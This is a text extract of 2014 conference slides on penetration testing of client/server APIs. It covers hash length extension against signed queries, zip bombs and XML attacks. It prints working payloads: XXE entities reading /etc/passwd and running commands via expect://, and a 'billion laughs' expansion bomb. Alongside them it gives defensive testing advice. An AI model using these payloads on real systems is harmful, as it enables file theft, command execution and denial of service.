More Related Content
Similar to CodeFest 2014 - Pentesting client/server API (20)
CodeFest 2014 - Pentesting client/server API
- 2. $ whoami
© 2002—2014, Digital Security 2
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction
CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
- 3. What are we talking about?
© 2002—2014, Digital Security 3
API
- 4. What are we talking about?
© 2002—2014, Digital Security 4
API
- 12. Hacking via API
© 2002—2014, Digital Security 12
What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
• Stop hacks and custom implementation in API! Really
- 18. Hacking via API
© 2002—2014, Digital Security 18
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
- 19. Hacking via API
© 2002—2014, Digital Security 19
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
…4.5 Pb! http://www.unforgettable.dk/
- 24. Hacking via API
© 2002—2014, Digital Security 24
http://habrahabr.ru/post/186160/
- 26. Hacking via API
© 2002—2014, Digital Security 26
Query signing
Sign = sha*(…+DATA+…)
APIkey
- 29. Hacking via API
© 2002—2014, Digital Security 29
Say hello again.
To length extension attack
- 30. Hacking via API
© 2002—2014, Digital Security 30
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
- 31. Hacking via API
© 2002—2014, Digital Security 31
Some have hijacked just 1 request…
- 32. Hacking via API
© 2002—2014, Digital Security 32
What does the attacker know?
• Original data
• Sign (token)
- 33. Hacking via API
© 2002—2014, Digital Security 33
What does the attacker want?
Change some data / change params
- 35. Hacking via API
© 2002—2014, Digital Security 35
Can sign new query without API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
- 46. Hacking via API
© 2002—2014, Digital Security 46
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;©right;</author>
- 48. Hacking via API
© 2002—2014, Digital Security 48
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
<foo>&xxe;</foo>
- 49. Hacking via API
© 2002—2014, Digital Security 49
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
“expect://id" >]>
<foo>&xxe;</foo>
- 51. Hacking via API
© 2002—2014, Digital Security 51
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz
(#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<lolz>&lol9;</lolz>
- 52. What are we talking about?
© 2002—2014, Digital Security 52
Man in the Middle
- 55. Hacking via API
© 2002—2014, Digital Security 55
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
- 56. Hacking via API
© 2002—2014, Digital Security 56
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
- 57. Hacking via API
© 2002—2014, Digital Security 57
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]